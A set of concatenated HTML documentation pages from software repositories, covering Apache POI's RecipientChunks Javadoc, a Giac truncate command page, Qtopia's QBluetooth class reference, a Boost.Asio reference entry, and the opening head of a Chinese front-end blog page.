<dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../../../constant-values.html#org.apache.poi.hsmf.datatypes.RecipientChunks.PREFIX">Constant Field Values</a></dd></dl>
</li>
</ul>
<a name="RECIPIENT_NAME">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>RECIPIENT_NAME</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> RECIPIENT_NAME</pre>
</li>
</ul>
<a name="DELIVERY_TYPE">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>DELIVERY_TYPE</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> DELIVERY_TYPE</pre>
</li>
</ul>
<a name="RECIPIENT_EMAIL_ADDRESS">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>RECIPIENT_EMAIL_ADDRESS</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> RECIPIENT_EMAIL_ADDRESS</pre>
</li>
</ul>
<a name="RECIPIENT_SEARCH">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>RECIPIENT_SEARCH</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> RECIPIENT_SEARCH</pre>
</li>
</ul>
<a name="RECIPIENT_SMTP_ADDRESS">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>RECIPIENT_SMTP_ADDRESS</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> RECIPIENT_SMTP_ADDRESS</pre>
</li>
</ul>
<a name="RECIPIENT_DISPLAY_NAME">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>RECIPIENT_DISPLAY_NAME</h4>
<pre>public static final <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a> RECIPIENT_DISPLAY_NAME</pre>
</li>
</ul>
<a name="recipientNumber">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>recipientNumber</h4>
<pre>public int recipientNumber</pre>
<div class="block">Our 0 based position in the list of recipients</div>
</li>
</ul>
<a name="recipientSearchChunk">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>recipientSearchChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/ByteChunk.html" title="class in org.apache.poi.hsmf.datatypes">ByteChunk</a> recipientSearchChunk</pre>
<div class="block">TODO</div>
</li>
</ul>
<a name="recipientNameChunk">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>recipientNameChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a> recipientNameChunk</pre>
<div class="block">The "name", which could be their name if an
internal person, or their email address
if an external person</div>
</li>
</ul>
<a name="recipientEmailChunk">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>recipientEmailChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a> recipientEmailChunk</pre>
<div class="block">The email address of the recipient, which
could be in SMTP or SEARCH format, but
isn't always present...</div>
</li>
</ul>
<a name="recipientSMTPChunk">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>recipientSMTPChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a> recipientSMTPChunk</pre>
<div class="block">The smtp destination email address of
the recipient, but isn't always present...</div>
</li>
</ul>
<a name="deliveryTypeChunk">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>deliveryTypeChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a> deliveryTypeChunk</pre>
<div class="block">Normally EX or SMTP. Will generally affect
where the email address ends up.</div>
</li>
</ul>
<a name="recipientDisplayNameChunk">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>recipientDisplayNameChunk</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a> recipientDisplayNameChunk</pre>
<div class="block">The display name of the recipient.
Normally seems to hold the same value
as in recipientNameChunk</div>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="RecipientChunks(java.lang.String)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>RecipientChunks</h4>
<pre>public RecipientChunks(java.lang.String name)</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getRecipientName()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getRecipientName</h4>
<pre>public java.lang.String getRecipientName()</pre>
<div class="block">Tries to find their name,
in whichever chunk holds it.</div>
</li>
</ul>
<a name="getRecipientEmailAddress()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getRecipientEmailAddress</h4>
<pre>public java.lang.String getRecipientEmailAddress()</pre>
<div class="block">Tries to find their email address, in
whichever chunk holds it given the
delivery type.</div>
</li>
</ul>
<a name="getProperties()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getProperties</h4>
<pre>public java.util.Map<<a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a>,java.util.List<<a href="../../../../../org/apache/poi/hsmf/datatypes/PropertyValue.html" title="class in org.apache.poi.hsmf.datatypes">PropertyValue</a>>> getProperties()</pre>
<div class="block"><strong>Description copied from interface: <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroupWithProperties.html#getProperties()">ChunkGroupWithProperties</a></code></strong></div>
<div class="block">Returns all the Properties contained in the Chunk, along
with their Values.
Normally, each property will have one value, sometimes
none, and rarely multiple (normally for Unknown etc).
For fixed sized properties, the value can be fetched
straight from the <a href="../../../../../org/apache/poi/hsmf/datatypes/PropertyValue.html" title="class in org.apache.poi.hsmf.datatypes"><code>PropertyValue</code></a>. For variable
sized properties, you'll need to go via the chunk.</div>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroupWithProperties.html#getProperties()">getProperties</a></code> in interface <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroupWithProperties.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroupWithProperties</a></code></dd>
</dl>
</li>
</ul>
<a name="getAll()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getAll</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a>[] getAll()</pre>
</li>
</ul>
<a name="getChunks()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getChunks</h4>
<pre>public <a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a>[] getChunks()</pre>
<div class="block"><strong>Description copied from interface: <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html#getChunks()">ChunkGroup</a></code></strong></div>
<div class="block">Returns the chunks that make up the group.
Should certainly contain all the interesting Chunks,
but needn't always contain all of the Chunks.</div>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html#getChunks()">getChunks</a></code> in interface <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroup</a></code></dd>
</dl>
</li>
</ul>
<a name="record(org.apache.poi.hsmf.datatypes.Chunk)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>record</h4>
<pre>public void record(<a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a> chunk)</pre>
<div class="block">Called by the parser whenever a chunk is found.</div>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html#record(org.apache.poi.hsmf.datatypes.Chunk)">record</a></code> in interface <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroup</a></code></dd>
</dl>
</li>
</ul>
<a name="chunksComplete()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>chunksComplete</h4>
<pre>public void chunksComplete()</pre>
<div class="block"><strong>Description copied from interface: <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html#chunksComplete()">ChunkGroup</a></code></strong></div>
<div class="block">Called by the parser when all chunks have been found.</div>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html#chunksComplete()">chunksComplete</a></code> in interface <code><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroup</a></code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/RecipientChunks.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/apache/poi/hsmf/datatypes/PropertyValue.TimePropertyValue.html" title="class in org.apache.poi.hsmf.datatypes"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.RecipientChunksSorter.html" title="class in org.apache.poi.hsmf.datatypes"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/poi/hsmf/datatypes/RecipientChunks.html" target="_top">Frames</a></li>
<li><a href="RecipientChunks.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li><a href="#nested_class_summary">Nested</a> | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright 2014 The Apache Software Foundation or
its licensors, as applicable.</i>
</small></p>
</body>
</html>
|
giac/giac-1.5.0/doc/en/cascmd_en/cascmd_en345.html | hiplayer/giac | <!DOCTYPE html>
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="generator" content="hevea 2.29+5 of 2017-05-18">
<link rel="stylesheet" type="text/css" href="cascmd_en.css">
<title>Truncate of order n : truncate</title>
</head>
<body >
<a href="cascmd_en344.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_en346.html"><img src="next_motif.gif" alt="Next"></a>
<hr>
<h3 id="sec417" class="subsection">5.29.24 Truncate of order <span style="font-style:italic">n</span> : <span style="font-family:monospace">truncate</span></h3>
<p><a id="hevea_default570"></a>
<span style="font-family:monospace">truncate</span> takes as argument, a polynomial and an integer
<span style="font-family:monospace">n</span>.<br>
<span style="font-family:monospace">truncate</span> truncates this polynomial at order <span style="font-family:monospace">n</span> (removing
all terms of order greater or equal to <span style="font-family:monospace">n+1</span>).<br>
<span style="font-family:monospace">truncate</span> may be used to transform a series expansion into a
polynomial or to compute a series expansion step by step.<br>
Input :
</p><div class="center"><span style="font-family:monospace">truncate((1+x+x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">2/2)</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">3,4)</span></div><p>
Output :
</p><div class="center"><span style="font-family:monospace">(9*x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">4+16*x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">3+18*x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">2+12*x+4)/4</span></div><p>
Input :
</p><div class="center"><span style="font-family:monospace">truncate(series(sin(x)),4)</span></div><p>
Output :
</p><div class="center"><span style="font-family:monospace">(-x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">3-(-6)*x)/6</span></div><p>
Note that the returned polynomial is normalized.</p>
<hr>
<a href="cascmd_en344.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_en346.html"><img src="next_motif.gif" alt="Next"></a>
</body>
</html>
|
doc/html/qbluetooth.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>QBluetooth Class Reference</title>
<link href="classic.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" valign="top" width="32"><img src="images/qpelogo.png" align="left" width="32" height="32" border="0" /></td>
<td width="1"> </td><td class="postheader" valign="center"><a href="index.html"><font color="#004faf">Home</font></a> · <a href="classes.html"><font color="#004faf">All Classes</font></a> · <a href="groups.html"><font color="#004faf">Grouped Classes</font></a> · <a href="annotated.html"><font color="#004faf">Annotated</font></a> · <a href="functions.html"><font color="#004faf">Functions</font></a></td>
<td align="right" valign="top"><img src="images/codeless.png" align="right" border="0" /></td></tr></table><h1 class="title">QBluetooth Class Reference</h1>
<p>The QBluetooth namespace contains miscellaneous Bluetooth functionality. <a href="#details">More...</a></p>
<pre> #include <QBluetooth></pre><ul>
<li><a href="qbluetooth-members.html">List of all members, including inherited members</a></li>
</ul>
<a name="public-types"></a>
<h3>Public Types</h3>
<ul>
<li><div class="fn"/>enum <b><a href="qbluetooth.html#DeviceMajor-enum">DeviceMajor</a></b> { Miscellaneous, Computer, Phone, LANAccess, ..., Uncategorized }</li>
<li><div class="fn"/>enum <b><a href="qbluetooth.html#SDPProfile-enum">SDPProfile</a></b> { SerialPortProfile, DialupNetworkingProfile, LanAccessProfile, FaxProfile, ..., HandsFreeAudioGatewayProfile }</li>
<li><div class="fn"/>enum <b><a href="qbluetooth.html#SecurityOption-enum">SecurityOption</a></b> { Authenticated, Encrypted, Secure }</li>
<li><div class="fn"/>flags <b><a href="qbluetooth.html#SecurityOption-enum">SecurityOptions</a></b></li>
<li><div class="fn"/>enum <b><a href="qbluetooth.html#ServiceClass-enum">ServiceClass</a></b> { Positioning, Networking, Rendering, Capturing, ..., AllServiceClasses }</li>
<li><div class="fn"/>flags <b><a href="qbluetooth.html#ServiceClass-enum">ServiceClasses</a></b></li>
</ul>
<a name="details"></a>
<hr />
<h2>Detailed Description</h2>
<p>The QBluetooth namespace contains miscellaneous Bluetooth functionality.</p>
<p>The QBluetooth namespace defines various functions and enums that are used globally by the Bluetooth library.</p>
<hr />
<h2>Member Type Documentation</h2>
<h3 class="fn"><a name="DeviceMajor-enum"></a>enum QBluetooth::DeviceMajor</h3>
<p>Defines the major class of a Bluetooth device.</p>
<p><table border="1" cellpadding="2" cellspacing="1" width="100%">
<tr><th width="25%">Constant</th><th width="15%">Value</th><th width="60%">Description</th></tr>
<tr><td valign="top"><tt>QBluetooth::Miscellaneous</tt></td><td align="center" valign="top"><tt>0</tt></td><td valign="top">Miscellaneous device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Computer</tt></td><td align="center" valign="top"><tt>1</tt></td><td valign="top">Computer device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Phone</tt></td><td align="center" valign="top"><tt>2</tt></td><td valign="top">Phone device</td></tr>
<tr><td valign="top"><tt>QBluetooth::LANAccess</tt></td><td align="center" valign="top"><tt>3</tt></td><td valign="top">Some form of a local area network router</td></tr>
<tr><td valign="top"><tt>QBluetooth::AudioVideo</tt></td><td align="center" valign="top"><tt>4</tt></td><td valign="top">Audio / Video device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Peripheral</tt></td><td align="center" valign="top"><tt>5</tt></td><td valign="top">Mouse, Joystick, Keyboard</td></tr>
<tr><td valign="top"><tt>QBluetooth::Imaging</tt></td><td align="center" valign="top"><tt>6</tt></td><td valign="top">Camera or Scanner device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Wearable</tt></td><td align="center" valign="top"><tt>7</tt></td><td valign="top">Wearable Device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Toy</tt></td><td align="center" valign="top"><tt>8</tt></td><td valign="top">Toy device</td></tr>
<tr><td valign="top"><tt>QBluetooth::Uncategorized</tt></td><td align="center" valign="top"><tt>9</tt></td><td valign="top">Uncategorized device</td></tr>
</table></p>
<h3 class="fn"><a name="SDPProfile-enum"></a>enum QBluetooth::SDPProfile</h3>
<p>Defines possible profiles in use by the system.</p>
<p><table border="1" cellpadding="2" cellspacing="1" width="100%">
<tr><th width="25%">Constant</th><th width="15%">Value</th><th width="60%">Description</th></tr>
<tr><td valign="top"><tt>QBluetooth::SerialPortProfile</tt></td><td align="center" valign="top"><tt>0</tt></td><td valign="top">Represents Serial Port profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::DialupNetworkingProfile</tt></td><td align="center" valign="top"><tt>1</tt></td><td valign="top">Represents Dialup Networking profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::LanAccessProfile</tt></td><td align="center" valign="top"><tt>2</tt></td><td valign="top">Represents LAN Access profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::FaxProfile</tt></td><td align="center" valign="top"><tt>3</tt></td><td valign="top">Represents FAX profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::ObjectPushProfile</tt></td><td align="center" valign="top"><tt>4</tt></td><td valign="top">Represents OBEX Object Push profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::FileTransferProfile</tt></td><td align="center" valign="top"><tt>5</tt></td><td valign="top">Represents OBEX File Transfer profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::DirectPrintingProfile</tt></td><td align="center" valign="top"><tt>6</tt></td><td valign="top">Represents the OBEX Simple Printing Profile (SPP), Direct Printing service.</td></tr>
<tr><td valign="top"><tt>QBluetooth::HeadsetProfile</tt></td><td align="center" valign="top"><tt>7</tt></td><td valign="top">Represents the Headset profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::HandsFreeProfile</tt></td><td align="center" valign="top"><tt>9</tt></td><td valign="top">Represents the Hands Free profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::SimAccessProfile</tt></td><td align="center" valign="top"><tt>11</tt></td><td valign="top">Represents the SIM Access profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::NetworkAccessPointProfile</tt></td><td align="center" valign="top"><tt>12</tt></td><td valign="top">Represents the PAN NAP profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::GroupAdHocNetworkProfile</tt></td><td align="center" valign="top"><tt>13</tt></td><td valign="top">Represents the PAN GN profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::PersonalAreaNetworkUserProfile</tt></td><td align="center" valign="top"><tt>14</tt></td><td valign="top">Represents the PAN PANU profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::HardCopyReplacementProfile</tt></td><td align="center" valign="top"><tt>15</tt></td><td valign="top">Represents the HCRP profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::AdvancedAudioSourceProfile</tt></td><td align="center" valign="top"><tt>16</tt></td><td valign="top">Represents the A2DP Source profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::AdvancedAudioSinkProfile</tt></td><td align="center" valign="top"><tt>17</tt></td><td valign="top">Represents the A2DP Sink profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::AudioVideoRemoteControlProfile</tt></td><td align="center" valign="top"><tt>18</tt></td><td valign="top">Represents the AVRCP Controller (CT) profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::AudioVideoTargetProfile</tt></td><td align="center" valign="top"><tt>19</tt></td><td valign="top">Represents the AVRCP Target (TG) profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::HeadsetAudioGatewayProfile</tt></td><td align="center" valign="top"><tt>8</tt></td><td valign="top">Represents the HS AG profile.</td></tr>
<tr><td valign="top"><tt>QBluetooth::HandsFreeAudioGatewayProfile</tt></td><td align="center" valign="top"><tt>10</tt></td><td valign="top">Represents the HF AG profile.</td></tr>
</table></p>
<h3 class="flags"><a name="SecurityOption-enum"></a>enum QBluetooth::SecurityOption<br />flags QBluetooth::SecurityOptions</h3>
<p>Defines possible security settings for Bluetooth L2CAP and RFCOMM connections.</p>
<p><table border="1" cellpadding="2" cellspacing="1" width="100%">
<tr><th width="25%">Constant</th><th width="15%">Value</th><th width="60%">Description</th></tr>
<tr><td valign="top"><tt>QBluetooth::Authenticated</tt></td><td align="center" valign="top"><tt>0x1</tt></td><td valign="top">The connection is authenticated.</td></tr>
<tr><td valign="top"><tt>QBluetooth::Encrypted</tt></td><td align="center" valign="top"><tt>0x2</tt></td><td valign="top">The connection is encrypted.</td></tr>
<tr><td valign="top"><tt>QBluetooth::Secure</tt></td><td align="center" valign="top"><tt>0x4</tt></td><td valign="top">The is secure. Generally this means that the connection is authenticated and encrypted. Please note that the meaning of this value is implementation dependent, it is more portable to use the Authenticated and Encrypted options.</td></tr>
</table></p>
<p>The SecurityOptions type is a typedef for <a href="qflags.html">QFlags</a><SecurityOption>. It stores an OR combination of SecurityOption values.</p>
<h3 class="flags"><a name="ServiceClass-enum"></a>enum QBluetooth::ServiceClass<br />flags QBluetooth::ServiceClasses</h3>
<p>Defines the service classes.</p>
<p><table border="1" cellpadding="2" cellspacing="1" width="100%">
<tr><th width="25%">Constant</th><th width="15%">Value</th><th width="60%">Description</th></tr>
<tr><td valign="top"><tt>QBluetooth::Positioning</tt></td><td align="center" valign="top"><tt>0x1</tt></td><td valign="top">Device has Positioning services (Location identification)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Networking</tt></td><td align="center" valign="top"><tt>0x2</tt></td><td valign="top">Device has Networking services (LAN, Ad hoc, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Rendering</tt></td><td align="center" valign="top"><tt>0x4</tt></td><td valign="top">Device has Rendering services (Printing, Speaker, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Capturing</tt></td><td align="center" valign="top"><tt>0x8</tt></td><td valign="top">Device has Capturing services (Scanner, Microphone, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::ObjectTransfer</tt></td><td align="center" valign="top"><tt>0x10</tt></td><td valign="top">Device has Object Transfer services (Object Push, FTP)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Audio</tt></td><td align="center" valign="top"><tt>0x20</tt></td><td valign="top">Device has Audio services (Speaker, Microphone, Headset service, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Telephony</tt></td><td align="center" valign="top"><tt>0x40</tt></td><td valign="top">Device has Telephony services (Cordless telephony, Modem, Headset service, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::Information</tt></td><td align="center" valign="top"><tt>0x80</tt></td><td valign="top">Device has Information services (WEB-server, WAP-server, ...)</td></tr>
<tr><td valign="top"><tt>QBluetooth::AllServiceClasses</tt></td><td align="center" valign="top"><tt>0xffff</tt></td><td valign="top">Special value that represents all service classes.</td></tr>
</table></p>
<p>The ServiceClasses type is a typedef for <a href="qflags.html">QFlags</a><ServiceClass>. It stores an OR combination of ServiceClass values.</p>
<p /><address><hr /><div align="center">
<table width="100%" cellspacing="0" border="0"><tr class="address">
<td align="left">Copyright © 2008 Trolltech</td>
<td align="center"><a href="trademarks.html">Trademarks</a></td>
<td align="right"><div align="right">Qtopia 4.3.4</div></td>
</tr></table></div></address></body>
</html>
|
myodd/boost/libs/asio/doc/html/boost_asio/reference/generic__datagram_protocol/type.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>generic::datagram_protocol::type</title>
<link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../../index.html" title="Boost.Asio">
<link rel="up" href="../generic__datagram_protocol.html" title="generic::datagram_protocol">
<link rel="prev" href="socket.html" title="generic::datagram_protocol::socket">
<link rel="next" href="../generic__raw_protocol.html" title="generic::raw_protocol">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="socket.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../generic__datagram_protocol.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../generic__raw_protocol.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_asio.reference.generic__datagram_protocol.type"></a><a class="link" href="type.html" title="generic::datagram_protocol::type">generic::datagram_protocol::type</a>
</h4></div></div></div>
<p>
<a class="indexterm" name="idm45464990056992"></a>
Obtain an identifier for the type of the
protocol.
</p>
<pre class="programlisting"><span class="keyword">int</span> <span class="identifier">type</span><span class="special">()</span> <span class="keyword">const</span><span class="special">;</span>
</pre>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2016 Christopher
M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="socket.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../generic__datagram_protocol.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../generic__raw_protocol.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
article/virgo/index.html | bizhongbio/bizhongbio.github.io | <!DOCTYPE html>
<html lang="zh-cmn-Hans">
<head>
<meta charset="utf-8">
<title>处女座 | 双鱼bizhongbio - 渡人渡己,前端开发技术博客</title>
<base href="https://bizhongbio.github.io/">
<meta http-equiv="X-UA-Compatible" content="IE=Edge, chrome=1">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<meta name="google" value="notranslate">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no, minimal-ui">
<meta name="description" content="演示地址:Virgo">
<meta name="keywords" content="网页设计">
<meta name="author" content="兰必钟(Bizhong Lan), https://bizhong.github.io/">
<meta name="robots" content="index, follow">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="双鱼bizhongbio">
<meta name="apple-mobile-web-app-capable" content="yes">
